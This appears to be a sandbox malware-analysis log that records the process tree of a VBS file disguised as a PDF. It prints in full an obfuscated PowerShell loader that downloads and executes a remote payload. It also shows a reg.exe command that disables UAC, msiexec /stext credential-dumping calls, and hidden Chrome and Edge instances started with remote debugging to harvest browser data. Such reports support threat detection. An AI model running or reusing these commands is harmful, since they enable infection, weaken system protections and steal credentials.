PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\074c592b-5cc0-496d-b3fa-45a09d4363ce·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nonargumentatively Dendrocoela Coalmonger Doorway Foranstaltningerne Socialcentret #><#Kiddushin Christins Isoantigen Pangas Timucua Uniformising servicekonceptets #>$polypian='Berytidae';function Mandages($Bellwether){If ($host.DebuggerEnabled) {$Balkily++;$Formummede=$Bellwether.'Length' - $Balkily} for ( $Hurraet=4;$Hurraet -lt $Formummede;$Hurraet+=5){$Alejandro=$Hurraet;$Buhkoen+=$Bellwether[$Hurraet]}$Buhkoen}function Tervariant($Replanter){ .($Socialhjlpsmodtagere) ($Replanter)}$Nringsmaterialerne=Mandages ' AskNStvlEEv cTSved.BlksWMas EUnnaBUndec alsl ReviVasoeOldnnForlTCrin ';$Hurraetngrainedness=Mandages 'Lft,MSl goFirez B oiEd.elUdmrlMagtaLunc/Mag ';$Acidulousness=Mandages ' Fi Ta.tilEsths aml1Sven2Zebi ';$Stevedoringerne='Rain[Fem.NBetaeMiniTn rm.SejlSEntre ProR T,mVBeami K ncDidaE opdP Beeo P uiHjb.nLap,tJunimmisoaAny,NRel,Apl tgKab.esygeROpre] A.r:N.na:Bl aSGyltEMucoCMan uhjesRInv I Pyot,tevYKaraPEc tR IleOBesut ravO GascS bsoAci lTeks=Nava$ TumaAngic ori SelDN ncU alolKommOFor,u legsdeacN UndEStemSAb as Vel ';$Hurraetngrainedness+=Mandages 'Mam 5Ove .A el0L.nk An a(Su.eWSetoiFabrnHomodKingoOmgrwE apsDans cleiNT ioTSort Aars1Khes0lvsp. obj0 ise;Sc e NonoWBrndiU ben Skr6Trfo4Stam;rase T naxVare6Avan4Con,;Unde OmkorBegrvPolo:Ejst1Task3Vol 1Fant. usk0Virk)Idle SamG kjaeFjarcbrank ostoFolk/Afsk2.orb0Sne 1 Cur0Wast0,rut1 am0Inte1Out Sa.sFElasiBortrL ste llfUnhooFlytxSkra/ b.t1 S.l3Prev1 et.Seti0Lobb ';$Rundrejserne=Mandages 'ProguF.rbsAfvaEMaanr S n-J spa AkaGAun eflodn S.etAphe ';$Skanke=Mandages 'Diath Dr t FeltSvmmpDeflsScu.:.eci/ Gus/Pr tdSuccrHeksiMis.vPothe .ac.Uncag iloRaceoRoekgRectlBidseSemi.Romac S.eo.ealm pos/RednuIllecA.th? skeeEnwoxK ckpTacioStifrStbetNonp=Prstd RegoTretw M nnBed,ldidaodal abijedBis &PinniE ecd ,in=Konj1Esp OPla m.epiV TrfE inQ.bilTPraezImmeE NonFMic USpud0UpmoCMarcm Tr PDo.nxVa sErecrdLynlID.sbDGru TKo sM PetBBystK moozS,ntKBill0 SkaLspndvLoveQTranC E,rDEpicxFart ';$Blyantsstiftens=Mandages 'I du>N nb ';$Socialhjlpsmodtagere=Mandages ' LaniStanELangXR gs ';$Resetter='biografiskes';$Leadout='\Overballast.Van';Tervariant (Mandages 'Dift$ HypgAnsvLBrneoIndbbBrugAB dsl P r: Anot,avnI InslEfteGFo.koSkold.once u.pS HysKMagaRCircIIntiVfstne Hux=buga$PseuE desnoutbVRead: gr ACiviP c,rpForudCiviaMo.ltForeA.ret+Gast$ VallVandeja iAB red,nbooNoneUEditTSubl ');Tervariant (Mandages 'Valg$ ,lkgBuddLFldno KryBPebaAA kol ,dk:Ca cAEksplLedelnineO S uPNattLDosmA WorsSr mMplne=Gorm$ verS Tork Du ARenoNUnc.K audeSa p. DynsMe aPApotL holIUndeTBar,(Reta$ Ti bFarrl ProYNaamADataN ForT AfssPreesDataT redI.ollFSuccTGasbeMegunK.ypsUnde) Amb ');Tervariant (Mandages $Stevedoringerne);$Skanke=$Alloplasm[0];$Bagstavnenes=(Mandages 'Demo$FritgVil,lA stOSemibPleuAFli l ol: ExclFumeE dapRSlavs ,ent ConAStraMFejlpIntreTon Tc.mu=Hav,nAtt ePrerW,eet-SkanoKogebHithJUnese isocSamatS,mi MahoSAutoYFumeSMervTdoc edatamVen .prot$.ompNWa tr VagiBilanvareGPs,mS abnMTiptANoncTKasseSalarTusii Acoa B wLAktiEResyr AffNTremE Rea ');Tervariant ($Bagstavnenes);Tervariant (Mandages 'Auto$TrstLSteme ThrrA,ies H.etKo oaSaldmA,stpnerve b,nt Unb.BowsHTraceAc ra N,gdDe,ieBogmrTernsNonc[ ve$ thuR stouS,ernSc nd umlr SyneUn ej IntsDekoeMilirMenin ArieErhv]Side=eder$Af iHKreeuMffer Manr ysia EnteAse tSnown trkgVar,rJorda rli F enDannePopud SolnFonteDys.sI,pes alg ');$bolines=Mandages 'Udb $SpreLRe.pebettrKultsSpgetp,ikaTsarmO.etpAldeeCatctVand.A baD .unoGen wE.isn illBouvoCir.a,ebgd Et FNemaiLownl TvaeDaab( F r$SydvSD.alk Stia arbnR,gikUdrieFelt, Bet$ fejFPintdSkoleLrt.nSam dSt neR adsRetn)rdse ';$Fdendes=$Tilgodeskrive;Tervariant (Mandages 'Chri$FoldGSa,oLWel OGeogB MilaPa iLJaco: TurlThr,A G nZ P,vuModeRProciC,mutTripEE cusFlle=Prin(Si,nTJur,EUtroSBlomTBun -iconp OveaKonfTProsHUrta ign$EpitFDyrpD TruePropNOstaDUn.oethorSA.pe)Opd ');while (!$lazurites) {Tervariant (Mandages 'Gaas$ Me,gAerelGrunoInteb Lsea ItclFagu: NilMT rvaSv,ncBiogr AfsawrinnCurld.ruer nteetwit=.ppe$GrahtTilrrUnbeu,riveIlio ') ;Tervariant $bolines;Tervariant (Mandages ' KalS ealtUa baSkn R Chat Ka -K ppsNanoLWos,ewebfeDaarpS ak Belu4,nke ');Tervariant (Mandages 'Attr$GravgSdcelHempOU,reBknorACrosLMa,s:Pseul Kama MisZG.tgUFal rSti IHulkt Bloe krisNonr=Non.(TrumTha,leGo,eSE nstMe l-p trP ashaFinatbankHAfst .ain$ Damf erDStavEko rnAutod M,kEIntes .vi)Inte ') ;Tervariant (Mandages 'Belg$MentGStralUr tOUn obSpisAUnifL Pro:DecicAllohScanlNo,sOSandrPer oDy,gpBusfH DomytetrcAkryehofmA TrieV.lm= Bet$ P.tgsamtLBud.oStraB eaga UnbL Tau:KirkGDissaSesqLBezzlMundESk,kO ainNFis,sNeis+Civi+Rupi%afv.$ManfAGlidLBovoL Ta ODiv.pBrstLD.taAGastsalkaMSeal.Helmc FyroUnviUPlouNNvnsTPrec ') ;$Skanke=$Alloplasm[$Chlorophyceae]}$Maze=301481;$Ruskninger=28816;Tervariant (Mandages 'Samf$ KakGOpfilTjuro Oe.BUnprAGashlR,ya:Farts oildRoi ERummSHeksTRoteONu,pfAnlifFeltePaleRTeleNJaileArboSKilo W is=Mdea Fo,GForhEsprdt Fr -In uCPartoS rmnTofrTOveremu,aNO lyTPr t Udbu$TamsfPlatD StrEPo.cNHodeDTa vE ScaSHere ');Tervariant (Mandages 'Non $Mag g G.ml.rmio rfrbSmagaMiljl Aff: .ubCLithoAktil uaroBebynUnspiVildsSubjaF eebPengistrel,kspiPlebtFl eiWinde IndsTumi Udhn= Udt dalf[TyfuSSttey Suss UnstOdeleT,scmQu.m.Ze,oCTi goRevinOddfvAsoce UtmrEn et Tv.] Mil: Ant:VandFGlimrBov.o,iccmSamfBReckaDoucs preeF jl6Oxid4SubcS F et MarrP.oviMin.nLodsgVolu( Ove$GraiS.lerdFeede evs fdt FruoRe afTrbufSti,eScorrGastnTerneVogtsPoli) ,ip ');Tervariant (Mandages 'Ud.v$CateGBlidLT rvoSootBS.maA lyvlMiss:MaftSR fot,fskIFr,kNFlamgIridF ubsI mfusPochh MaxEi,disDing Balt=Aban Dest[ Re.s oreYP rlSIliutBo.iET,moMTita.CmdrTshepeFnikXTitrtHusb. beceMariNFortcUdnaO k mD ngeiDekanA,tiGLull] ,ty:Laan: .ncALetnS CovC TiliGy eILucr.WeekgUndie luft tops Fa TGasrrCoppi prnForug acu(a tf$Per.cTangosemiLStenODresn Be,iUncrsPookAWhorbag,lI TreLTa eiPr,ktUre IShage LarSe th)In x ');Tervariant (Mandages '.can$CorwgIndelFngsO.eriBRi jaIldsLresy:BevrVpip EGenaNValgeSammkClerL SluaFrucPAss =Delt$ LevS orbTRecei.rianPelogD xtfArk I SkdsBad.HKok,eKrftSOutg.EkspsConcuEc ib T os BastRetrR .ubI LibNSt mGProg(Ranc$PerlMToteaRynkZ H aeVres, Spr$.oleRP.nju Ganspreak iftNDidliOutmnCrengenthe SurRAar ) .rd ');Tervariant $Veneklap;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#nonargumentatively Dendrocoela Coalmonger Doorway Foranstaltningerne Socialcentret #><#Kiddushin Christins Isoantigen Pangas Timucua Uniformising servicekonceptets #>$polypian='Berytidae';function Mandages($Bellwether){If ($host.DebuggerEnabled) {$Balkily++;$Formummede=$Bellwether.'Length' - $Balkily} for ( $Hurraet=4;$Hurraet -lt $Formummede;$Hurraet+=5){$Alejandro=$Hurraet;$Buhkoen+=$Bellwether[$Hurraet]}$Buhkoen}function Tervariant($Replanter){ .($Socialhjlpsmodtagere) ($Replanter)}$Nringsmaterialerne=Mandages ' AskNStvlEEv cTSved.BlksWMas EUnnaBUndec alsl ReviVasoeOldnnForlTCrin ';$Hurraetngrainedness=Mandages 'Lft,MSl goFirez B oiEd.elUdmrlMagtaLunc/Mag ';$Acidulousness=Mandages ' Fi Ta.tilEsths aml1Sven2Zebi ';$Stevedoringerne='Rain[Fem.NBetaeMiniTn rm.SejlSEntre ProR T,mVBeami K ncDidaE opdP Beeo P uiHjb.nLap,tJunimmisoaAny,NRel,Apl tgKab.esygeROpre] A.r:N.na:Bl aSGyltEMucoCMan uhjesRInv I Pyot,tevYKaraPEc tR IleOBesut ravO GascS bsoAci lTeks=Nava$ TumaAngic ori SelDN ncU alolKommOFor,u legsdeacN UndEStemSAb as Vel ';$Hurraetngrainedness+=Mandages 'Mam 5Ove .A el0L.nk An a(Su.eWSetoiFabrnHomodKingoOmgrwE apsDans cleiNT ioTSort Aars1Khes0lvsp. obj0 ise;Sc e NonoWBrndiU ben Skr6Trfo4Stam;rase T naxVare6Avan4Con,;Unde OmkorBegrvPolo:Ejst1Task3Vol 1Fant. usk0Virk)Idle SamG kjaeFjarcbrank ostoFolk/Afsk2.orb0Sne 1 Cur0Wast0,rut1 am0Inte1Out Sa.sFElasiBortrL ste llfUnhooFlytxSkra/ b.t1 S.l3Prev1 et.Seti0Lobb ';$Rundrejserne=Mandages 'ProguF.rbsAfvaEMaanr S n-J spa AkaGAun eflodn S.etAphe ';$Skanke=Mandages 'Diath Dr t FeltSvmmpDeflsScu.:.eci/ Gus/Pr tdSuccrHeksiMis.vPothe .ac.Uncag iloRaceoRoekgRectlBidseSemi.Romac S.eo.ealm pos/RednuIllecA.th? skeeEnwoxK ckpTacioStifrStbetNonp=Prstd RegoTretw M nnBed,ldidaodal abijedBis &PinniE ecd ,in=Konj1Esp OPla m.epiV TrfE inQ.bilTPraezImmeE NonFMic USpud0UpmoCMarcm Tr PDo.nxVa sErecrdLynlID.sbDGru TKo sM PetBBystK moozS,ntKBill0 SkaLspndvLoveQTranC E,rDEpicxFart ';$Blyantsstiftens=Mandages 'I du>N nb ';$Socialhjlpsmodtagere=Mandages ' LaniStanELangXR gs ';$Resetter='biografiskes';$Leadout='\Overballast.Van';Tervariant (Mandages 'Dift$ HypgAnsvLBrneoIndbbBrugAB dsl P r: Anot,avnI InslEfteGFo.koSkold.once u.pS HysKMagaRCircIIntiVfstne Hux=buga$PseuE desnoutbVRead: gr ACiviP c,rpForudCiviaMo.ltForeA.ret+Gast$ VallVandeja iAB red,nbooNoneUEditTSubl ');Tervariant (Mandages 'Valg$ ,lkgBuddLFldno KryBPebaAA kol ,dk:Ca cAEksplLedelnineO S uPNattLDosmA WorsSr mMplne=Gorm$ verS Tork Du ARenoNUnc.K audeSa p. DynsMe aPApotL holIUndeTBar,(Reta$ Ti bFarrl ProYNaamADataN ForT AfssPreesDataT redI.ollFSuccTGasbeMegunK.ypsUnde) Amb ');Tervariant (Mandages $Stevedoringerne);$Skanke=$Alloplasm[0];$Bagstavnenes=(Mandages 'Demo$FritgVil,lA stOSemibPleuAFli l ol: ExclFumeE dapRSlavs ,ent ConAStraMFejlpIntreTon Tc.mu=Hav,nAtt ePrerW,eet-SkanoKogebHithJUnese isocSamatS,mi MahoSAutoYFumeSMervTdoc edatamVen .prot$.ompNWa tr VagiBilanvareGPs,mS abnMTiptANoncTKasseSalarTusii Acoa B wLAktiEResyr AffNTremE Rea ');Tervariant ($Bagstavnenes);Tervariant (Mandages 'Auto$TrstLSteme ThrrA,ies H.etKo oaSaldmA,stpnerve b,nt Unb.BowsHTraceAc ra N,gdDe,ieBogmrTernsNonc[ ve$ thuR stouS,ernSc nd umlr SyneUn ej IntsDekoeMilirMenin ArieErhv]Side=eder$Af iHKreeuMffer Manr ysia EnteAse tSnown trkgVar,rJorda rli F enDannePopud SolnFonteDys.sI,pes alg ');$bolines=Mandages 'Udb $SpreLRe.pebettrKultsSpgetp,ikaTsarmO.etpAldeeCatctVand.A baD .unoGen wE.isn illBouvoCir.a,ebgd Et FNemaiLownl TvaeDaab( F r$SydvSD.alk Stia arbnR,gikUdrieFelt, Bet$ fejFPintdSkoleLrt.nSam dSt neR adsRetn)rdse ';$Fdendes=$Tilgodeskrive;Tervariant (Mandages 'Chri$FoldGSa,oLWel OGeogB MilaPa iLJaco: TurlThr,A G nZ P,vuModeRProciC,mutTripEE cusFlle=Prin(Si,nTJur,EUtroSBlomTBun -iconp OveaKonfTProsHUrta ign$EpitFDyrpD TruePropNOstaDUn.oethorSA.pe)Opd ');while (!$lazurites) {Tervariant (Mandages 'Gaas$ Me,gAerelGrunoInteb Lsea ItclFagu: NilMT rvaSv,ncBiogr AfsawrinnCurld.ruer nteetwit=.ppe$GrahtTilrrUnbeu,riveIlio ') ;Tervariant $bolines;Tervariant (Mandages ' KalS ealtUa baSkn R Chat Ka -K ppsNanoLWos,ewebfeDaarpS ak Belu4,nke ');Tervariant (Mandages 'Attr$GravgSdcelHempOU,reBknorACrosLMa,s:Pseul Kama MisZG.tgUFal rSti IHulkt Bloe krisNonr=Non.(TrumTha,leGo,eSE nstMe l-p trP ashaFinatbankHAfst .ain$ Damf erDStavEko rnAutod M,kEIntes .vi)Inte ') ;Tervariant (Mandages 'Belg$MentGStralUr tOUn obSpisAUnifL Pro:DecicAllohScanlNo,sOSandrPer oDy,gpBusfH DomytetrcAkryehofmA TrieV.lm= Bet$ P.tgsamtLBud.oStraB eaga UnbL Tau:KirkGDissaSesqLBezzlMundESk,kO ainNFis,sNeis+Civi+Rupi%afv.$ManfAGlidLBovoL Ta ODiv.pBrstLD.taAGastsalkaMSeal.Helmc FyroUnviUPlouNNvnsTPrec ') ;$Skanke=$Alloplasm[$Chlorophyceae]}$Maze=301481;$Ruskninger=28816;Tervariant (Mandages 'Samf$ KakGOpfilTjuro Oe.BUnprAGashlR,ya:Farts oildRoi ERummSHeksTRoteONu,pfAnlifFeltePaleRTeleNJaileArboSKilo W is=Mdea Fo,GForhEsprdt Fr -In uCPartoS rmnTofrTOveremu,aNO lyTPr t Udbu$TamsfPlatD StrEPo.cNHodeDTa vE ScaSHere ');Tervariant (Mandages 'Non $Mag g G.ml.rmio rfrbSmagaMiljl Aff: .ubCLithoAktil uaroBebynUnspiVildsSubjaF eebPengistrel,kspiPlebtFl eiWinde IndsTumi Udhn= Udt dalf[TyfuSSttey Suss UnstOdeleT,scmQu.m.Ze,oCTi goRevinOddfvAsoce UtmrEn et Tv.] Mil: Ant:VandFGlimrBov.o,iccmSamfBReckaDoucs preeF jl6Oxid4SubcS F et MarrP.oviMin.nLodsgVolu( Ove$GraiS.lerdFeede evs fdt FruoRe afTrbufSti,eScorrGastnTerneVogtsPoli) ,ip ');Tervariant (Mandages 'Ud.v$CateGBlidLT rvoSootBS.maA lyvlMiss:MaftSR fot,fskIFr,kNFlamgIridF ubsI mfusPochh MaxEi,disDing Balt=Aban Dest[ Re.s oreYP rlSIliutBo.iET,moMTita.CmdrTshepeFnikXTitrtHusb. beceMariNFortcUdnaO k mD ngeiDekanA,tiGLull] ,ty:Laan: .ncALetnS CovC TiliGy eILucr.WeekgUndie luft tops Fa TGasrrCoppi prnForug acu(a tf$Per.cTangosemiLStenODresn Be,iUncrsPookAWhorbag,lI TreLTa eiPr,ktUre IShage LarSe th)In x ');Tervariant (Mandages '.can$CorwgIndelFngsO.eriBRi jaIldsLresy:BevrVpip EGenaNValgeSammkClerL SluaFrucPAss =Delt$ LevS orbTRecei.rianPelogD xtfArk I SkdsBad.HKok,eKrftSOutg.EkspsConcuEc ib T os BastRetrR .ubI LibNSt mGProg(Ranc$PerlMToteaRynkZ H aeVres, Spr$.oleRP.nju Ganspreak iftNDidliOutmnCrengenthe SurRAar ) .rd ');Tervariant $Veneklap;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9d9b9cc40,0x7ff9d9b9cc4c,0x7ff9d9b9cc58

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mjefag"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\oljybzwmk"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\oljybzwmk"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\oljybzwmk"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\yfpqbrgoycnn"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1928,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1924 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2108,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2128 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2308 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3220 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4376,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3676 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4696,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4692 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4700 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9d9a546f8,0x7ff9d9a54708,0x7ff9d9a54718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2012 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2980 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

